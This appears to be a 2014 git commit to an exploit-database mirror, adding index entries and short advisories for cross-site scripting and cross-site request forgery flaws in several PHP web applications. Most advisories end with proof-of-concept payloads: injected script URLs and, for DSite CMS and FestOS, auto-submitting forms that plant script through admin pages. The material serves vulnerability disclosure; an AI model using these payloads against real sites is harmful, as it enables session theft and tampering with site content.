Updated 08_13_2014
This commit is contained in:
parent
77dff34f06
commit
61b227234d
9 changed files with 112 additions and 0 deletions
|
@ -30910,3 +30910,11 @@ id,file,description,date,author,platform,type,port
|
|||
34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
|
||||
34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
|
||||
34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0
|
||||
34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 '228-recherche.php' Cross Site Scripting Vulnerability",2009-12-13,loneferret,php,webapps,0
|
||||
34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-13,bi0,php,webapps,0
|
||||
34319,platforms/php/webapps/34319.txt,"Ez Cart 'index.php' Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
|
||||
34320,platforms/php/webapps/34320.txt,"GetSimple CMS 2.01 admin/template/error_checking.php Multiple Parameter XSS",2010-07-15,Leonard,php,webapps,0
|
||||
34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2010-07-15,"Nijel the Destroyer",php,webapps,0
|
||||
34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 'phpwcms.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 'modmenu.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
34324,platforms/php/webapps/34324.txt,"FestOS 2.3 'contents' Parameter Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
10
platforms/php/webapps/34317.txt
Executable file
10
platforms/php/webapps/34317.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41686/info
|
||||
|
||||
Automne is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Automne version 4.0.0rc2 is vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
http://www.example.com/web/fr/228-recherche.php?q=<input type="Submit" name="Delete" value="ClickMe"onClick="alert(1)">
|
14
platforms/php/webapps/34318.txt
Executable file
14
platforms/php/webapps/34318.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/41689/info
|
||||
|
||||
|
||||
Zeecareers is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities.
|
||||
|
||||
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The attacker may leverage the authentication-bypass issues to access information without proper authentication.
|
||||
|
||||
Zeecareers version 2.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/basic_search_result.php?title=[XSS]
|
10
platforms/php/webapps/34319.txt
Executable file
10
platforms/php/webapps/34319.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/41696/info
|
||||
|
||||
Ez Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/ezcart_demo/index.php?action=showcat&cid=1&sid="><script>alert(1)</script>
|
25
platforms/php/webapps/34320.txt
Executable file
25
platforms/php/webapps/34320.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/41697/info
|
||||
|
||||
GetSimple CMS is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, an HTML-injection vulnerability, and a directory-traversal vulnerability.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to retrieve and possibly execute arbitrary files through the use of directory-traversal strings, to obtain potentially sensitive information, or to execute arbitrary local scripts in the context of the webserver process.
|
||||
|
||||
GetSimple CMS 2.01 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
|
||||
http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS]
|
9
platforms/php/webapps/34321.txt
Executable file
9
platforms/php/webapps/34321.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41701/info
|
||||
|
||||
Spitfire is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
|
||||
|
||||
Spitfire 1.0.381 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cont_index.php?cms_id=PAGE_ID&search=1"><script>alert(document.cookie)</script>
|
9
platforms/php/webapps/34322.txt
Executable file
9
platforms/php/webapps/34322.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41720/info
|
||||
|
||||
phpwcms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
phpwcms 1.4.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http:/www.example.com/phpwcms.php?do=modules&module=calendar&calendardate=8-2010%22+onmouseover=alert%2834%29+style=position:absolute;width:100%;height:100%;left:0;top:0;+%22
|
18
platforms/php/webapps/34323.html
Executable file
18
platforms/php/webapps/34323.html
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/41724/info
|
||||
|
||||
DSite CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
DSite CMS 4.81 is vulnerable; prior versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/admin/plugin.php?menu_id=1&module=menu&plitem=modmenu.php" method="post" name="main" >
|
||||
<input type="hidden" name="module" value="menu" />
|
||||
<input type="hidden" name="plitem" value="modmenu.php" />
|
||||
<input type="hidden" name="menu_id" value="1" />
|
||||
<input type="hidden" name="button_name" value='bn"><script>alert(document.cookie)</script>' />
|
||||
<input type="hidden" name="new_make" value="YES" />
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
9
platforms/php/webapps/34324.txt
Executable file
9
platforms/php/webapps/34324.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41725/info
|
||||
|
||||
FestOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
FestOS version 2.3b is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/admin/do_snippets_edit.php?tabname=Pages" method="post" name="main" > <input type="hidden" name="snippetID" value="1" /> <input type="hidden" name="title" value="Site footer" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="contents" value='footer"><script>alert(document.cookie)</script>' /> </form> <script> document.main.submit(); </script>
|
Loading…
Add table
Reference in a new issue